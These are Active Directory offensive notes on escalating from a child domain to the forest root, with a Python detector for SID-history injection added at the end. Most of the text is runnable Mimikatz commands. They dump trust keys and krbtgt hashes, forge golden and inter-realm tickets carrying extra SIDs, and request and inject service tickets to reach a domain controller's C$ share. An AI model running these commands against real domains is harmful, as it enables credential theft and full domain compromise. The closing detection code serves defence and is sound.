Privilege Escalation Across Trusts

Child to Forest Root

  - Domains in the same forest have an implicit two-way trust with the forest root.

  - There is a trust key between the parent and child domains.

  - There are two ways of escalating privileges between two domains of the same forest: the KRBTGT hash and trust tickets.

Forging Trust Tickets Child to Forest Root

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Once we have the trust key, let's forge an inter-realm TGT

Invoke-Mimikatz -Command '"Kerberos::golden /domain:victim.local /sid: /sids: /rc4: /user:Administrator /service:krbtgt /target: /ticket:"'

Getting a TGS for a service such as CIFS by using the forged trust ticket

.\asktgs.exe C:\Users\pathToTicket.kirbi CIFS/victim.local

Tickets for other services can be created the same way: HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM

Once we have the TGS for a service, we can use it to access the targeted service with the following

.\kirbikator.exe lsa .\CIFS.victim.local.kirbi
ls \\dc01.victim.local\C$

Forging a ticket from Child Domain to Forest Root using krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid:<child domain SID> /krbtgt: /sids: /ticket:"'

On a machine of the parent domain you want to get into, inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt C:\locationof.kirbi_file"'
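Both techniques above work because the forged ticket's SID history carries forest-root SIDs for a child-domain principal, so the defensive check is to look for tokens in which an account from one domain holds privileged group SIDs of another domain. The following is an added example, not code from the original notes: Python run over constructed logon records (account SID plus the group SIDs in the token); the domain SIDs, the record layout and the privileged-RID set are assumptions.

```python
"""Flag logon tokens where a principal from one domain carries privileged SIDs
from another domain of the forest: the pattern left by SID-history injection.
Added example, not code from the original notes; SIDs and records are constructed."""
from __future__ import annotations
import re

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# RIDs of the privileged groups a forged ticket would add via /sids (assumed set).
PRIVILEGED_RIDS = {500, 512, 516, 518, 519}

# Constructed domain SIDs for the child -> forest-root scenario above.
FOREST_ROOT = "S-1-5-21-1111111111-2222222222-3333333333"
CHILD = "S-1-5-21-4444444444-5555555555-6666666666"
KNOWN_DOMAINS = {FOREST_ROOT: "victim.local", CHILD: "child.victim.local"}

def split_sid(sid: str) -> tuple[str, int] | None:
    """Return (domain identifier, RID) for a domain SID; None for well-known SIDs."""
    m = SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None

def suspicious_sids(account_sid: str, group_sids: list[str]) -> list[str]:
    """SIDs in the token that are privileged groups of a different domain than the
    account's own, or that belong to a domain outside the known forest."""
    acct = split_sid(account_sid)
    if acct is None:
        return []
    hits = []
    for sid in group_sids:
        parts = split_sid(sid)
        if parts is None:
            continue  # built-in SID such as S-1-5-32-545 (BUILTIN\Users)
        dom, rid = parts
        if dom not in KNOWN_DOMAINS:
            hits.append(sid)  # domain SID not in the forest at all
        elif dom != acct[0] and rid in PRIVILEGED_RIDS:
            hits.append(sid)  # e.g. a child user carrying the root's Enterprise Admins SID
    return hits

# Constructed logon records: account SID plus the group SIDs present in the token.
RECORDS = [
    {"user": "child\\alice", "sid": f"{CHILD}-1105", "groups": [f"{CHILD}-513", "S-1-5-32-545"]},
    {"user": "child\\Administrator", "sid": f"{CHILD}-500", "groups": [f"{CHILD}-512", f"{FOREST_ROOT}-519"]},
]

def scan(records=RECORDS) -> dict[str, list[str]]:
    """Map each user whose token holds suspicious cross-domain SIDs to those SIDs."""
    return {r["user"]: s for r in records if (s := suspicious_sids(r["sid"], r["groups"]))}
```

Only the second constructed record is reported, because its child-domain account carries the forest root's RID 519 (Enterprise Admins) SID while the first record's groups all belong to its own domain or are built-in.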
